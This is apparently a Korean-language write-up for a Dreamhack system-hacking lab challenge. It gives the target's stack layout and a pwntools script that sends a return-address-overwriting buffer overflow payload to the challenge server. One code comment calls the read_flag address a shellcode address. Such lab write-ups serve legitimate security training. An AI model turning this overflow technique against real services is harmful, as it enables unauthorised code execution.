[System Hacking] basic_exploitation_001

<read_flag>의 주소: 0x80485b9

buffer size: 0x80

Arch:     i386-32-little

memory layout:
...
buf (0x80 byte)
SFP (0x4 byte)
ret address (0x4 byte)
...

payload (should be 0x88 byte): 
쓰레기 값 (0x84 byte)
read_flag의 주소 (0x4 byte)

 

from pwn import *
 
p = remote("host3.dreamhack.games", 9796)
 
# 쓰레기 값
payload = b"\x41" * 0x84
# 셸코드의 주소 추가
payload += b"\xb9\x85\x04\x08"

p.send(payload)
 
p.interactive()